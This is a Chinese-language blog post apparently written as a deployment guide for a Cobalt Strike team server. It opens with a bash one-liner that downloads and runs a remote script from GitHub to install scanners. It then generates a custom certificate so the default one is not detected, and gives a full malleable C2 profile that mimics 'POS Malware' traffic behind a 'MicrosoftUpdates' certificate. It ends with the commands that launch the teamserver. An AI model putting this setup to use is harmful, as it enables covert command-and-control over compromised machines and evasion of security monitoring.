- Published on
CS部署
- Authors
- Name
- 大聪明
- @wooluoo
VPS 快速部署 afrog nuclei yak
bash <(curl -sS -L https://raw.githubusercontent.com/wooluo/gogogo/main/tools.sh)
生成自定义SSL证书
在运行 cobalt strike 默认使用的 cobaltstrike.store 证书,
生成新证书的意义是将使用我们现在的制定好的证书。
默认的证书 cobalt strike 会被检测。下面是生成证书的一些命令。
root@vultr:~/Server# keytool -genkey -alias 2b -keyalg RSA -validity 36500 -keystore 2b.store
Enter keystore password: #**后面配置文件中密码**
Re-enter new password:
Enter the distinguished name. Provide a single dot (.) to leave a sub-component empty or press ENTER to use the default value in braces.
What is your first and last name?
[Unknown]: us
What is the name of your organizational unit?
[Unknown]: us
What is the name of your organization?
[Unknown]: us
What is the name of your City or Locality?
[Unknown]: USA
What is the name of your State or Province?
[Unknown]: US
What is the two-letter country code for this unit?
[Unknown]: 24
Is CN=us, OU=us, O=us, L=USA, ST=US, C=24 correct?
[no]: yes
Generating 3,072 bit RSA key pair and self-signed certificate (SHA384withRSA) with a validity of 36,500 days
for: CN=us, OU=us, O=us, L=USA, ST=US, C=24
root@vultr:~/Server#cat 2b.profile
set sample_name "2b POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101
Firefox/24.0";
#设置证书
https-certificate {
set CN "US";
set O "MicrosoftUpdates";
set C "en";
set L "US";
set OU "MicrosoftUpdates";
set ST "US";
set validity "365";
}
#设置
code-signer{
set keystore "2b.store";
set password "passw**d*"; #这里密码就是生成证书的密码
set alias "alias";
}
#指定 DNS beacon 不用的时候指定到 IP 地址
set dns_idle "8.8.4.4";
#每个单独 DNS 请求前强制睡眠时间
set dns_sleep "0";
#通过 DNS 上载数据时主机名的最大长度[0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php
/windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urlencoded";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @
PC&wv=11&gr=backoff&bv=1.55&data=";
print;
}
}
server {
output {
print;
}
}
}
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
}
}
server {
header "Content-Type" "text/plain";
output {
base64;
print;
}
}
}
检测 C2 profile 文件是否可用
./c2lint 2b.profile
打开CS所需用的端口
ufw allow 50050
ufw allow 80
ufw allow 443
ufw reload
root@vultr:~/Server# nohup ./teamserver 10.*.*.9 **passwd** 2b.profile &
在客户端运行./cobaltstrike-client.sh
然后填入ip 10.*.*.9
端口默认是50050
密码就是 **passwd**